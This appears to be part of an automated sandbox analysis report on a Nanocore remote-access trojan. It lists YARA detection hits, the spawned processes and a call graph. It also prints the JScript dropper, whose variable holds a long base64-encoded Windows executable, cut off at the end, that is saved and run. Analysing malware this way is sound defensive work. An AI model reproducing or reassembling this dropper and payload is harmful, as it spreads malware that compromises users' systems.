                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000003.00000002.342324519.00000000035E1000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000003.00000002.342324519.00000000035E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: NanoCore, Description: unknown, Source: 00000003.00000002.342324519.00000000035E1000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000003.00000002.342324519.00000000035E1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000003.00000002.341180010.0000000000415000.00000040.80000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000003.00000002.341180010.0000000000415000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                • Rule: NanoCore, Description: unknown, Source: 00000003.00000002.341180010.0000000000415000.00000040.80000000.00040000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000003.00000002.341180010.0000000000415000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000003.00000002.341497445.00000000007E8000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000003.00000002.341497445.00000000007E8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: NanoCore, Description: unknown, Source: 00000003.00000002.341497445.00000000007E8000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000003.00000002.341497445.00000000007E8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000003.00000002.342556936.0000000004922000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000003.00000002.342556936.0000000004922000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: NanoCore, Description: unknown, Source: 00000003.00000002.342556936.0000000004922000.00000040.00001000.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000003.00000002.342556936.0000000004922000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000003.00000002.341910417.00000000023A0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000003.00000002.341910417.00000000023A0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000003.00000002.341910417.00000000023A0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000003.00000002.341910417.00000000023A0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                • Rule: NanoCore, Description: unknown, Source: 00000003.00000002.341910417.00000000023A0000.00000004.08000000.00040000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000003.00000002.341910417.00000000023A0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                • Rule: NanoCore, Description: unknown, Source: 00000003.00000002.342122347.0000000002630000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000003.00000002.342122347.0000000002630000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                Reputation:low

                Target ID:8
                Start time:16:39:40
                Start date:01/02/2023
                Path:C:\Users\user\AppData\Local\Temp\czkdqe.exe
                Wow64 process (32bit):true
                Commandline:"C:\Users\user\AppData\Local\Temp\czkdqe.exe"
                Imagebase:0x400000
                File size:76800 bytes
                MD5 hash:7623E43BAB89AD62BD536D06A1751BB9
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:low

                Target ID:10
                Start time:16:39:42
                Start date:01/02/2023
                Path:C:\Users\user\AppData\Roaming\jrwodjjaoqgx\vktp.exe
                Wow64 process (32bit):true
                Commandline:"C:\Users\user\AppData\Roaming\jrwodjjaoqgx\vktp.exe" "C:\Users\user\AppData\Local\Temp\czkdqe.exe" C:\Users\user\AppData\Local\
                Imagebase:0x400000
                File size:76800 bytes
                MD5 hash:7623E43BAB89AD62BD536D06A1751BB9
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:low

                Target ID:12
                Start time:16:39:42
                Start date:01/02/2023
                Path:C:\Windows\SysWOW64\WerFault.exe
                Wow64 process (32bit):true
                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1372 -s 616
                Imagebase:0x920000
                File size:434592 bytes
                MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                Target ID:14
                Start time:16:39:46
                Start date:01/02/2023
                Path:C:\Windows\SysWOW64\WerFault.exe
                Wow64 process (32bit):true
                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4936 -s 656
                Imagebase:0x920000
                File size:434592 bytes
                MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high

                Target ID:16
                Start time:16:39:50
                Start date:01/02/2023
                Path:C:\Users\user\AppData\Roaming\jrwodjjaoqgx\vktp.exe
                Wow64 process (32bit):true
                Commandline:"C:\Users\user\AppData\Roaming\jrwodjjaoqgx\vktp.exe" "C:\Users\user\AppData\Local\Temp\czkdqe.exe" C:\Users\user\AppData\Local\
                Imagebase:0x400000
                File size:76800 bytes
                MD5 hash:7623E43BAB89AD62BD536D06A1751BB9
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:low

                Target ID:18
                Start time:16:39:51
                Start date:01/02/2023
                Path:C:\Windows\SysWOW64\WerFault.exe
                Wow64 process (32bit):true
                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2160 -s 628
                Imagebase:0x920000
                File size:434592 bytes
                MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high

                Call Graph

                • Executed
                • Not Executed
                callgraph clusterC0 clusterC2C0 clusterC4C2 clusterC6C0 clusterC8C0 clusterC10C0 clusterC12C0 clusterC14C0 clusterC34C0 clusterC16C0 clusterC18C0 clusterC32C0 clusterC20C0 clusterC22C0 clusterC30C0 clusterC24C0 clusterC26C0 clusterC28C0 E1C0 entry:C0 F7C6 CreateObject E1C0->F7C6 F9C8 createElement E1C0->F9C8 F11C10 CreateObject E1C0->F11C10 F13C12 Open E1C0->F13C12 F15C14 Write E1C0->F15C14 F17C16 CreateObject E1C0->F17C16 F19C18 ExpandEnvironmentStrings E1C0->F19C18 F21C20 ExpandEnvironmentStrings E1C0->F21C20 F23C22 SaveToFile E1C0->F23C22 F25C24 endsWith E1C0->F25C24 F27C26 run E1C0->F27C26 F29C28 endsWith E1C0->F29C28 F31C30 endsWith E1C0->F31C30 F33C32 run E1C0->F33C32 F35C34 run E1C0->F35C34 F3C2 F5C4 substr F3C2->F5C4

                Script:

                Code
                0
                try
                  1
                  {
                    2
                    String.prototype.endsWith =
                      3
                      function (needle) {
                      • "C:\Users\jones\AppData\Roaming\vtvt.exe".endsWith(".jar") ➔ false
                      • "C:\Users\jones\AppData\Roaming\vtvt.exe".endsWith(".vbs") ➔ false
                      • "C:\Users\jones\AppData\Roaming\vtvt.exe".endsWith(".wsf") ➔ false
                      4
                      var emp = this.substr ( this.length - needle.length );
                      • C:\Users\jones\AppData\Roaming\vtvt.exe.substr(35) ➔ ".exe"
                      • C:\Users\jones\AppData\Roaming\vtvt.exe.substr(35) ➔ ".exe"
                      • C:\Users\jones\AppData\Roaming\vtvt.exe.substr(35) ➔ ".exe"
                      5
                      return emp == needle;
                        6
                        };
                          7
                          var aso_ibora = "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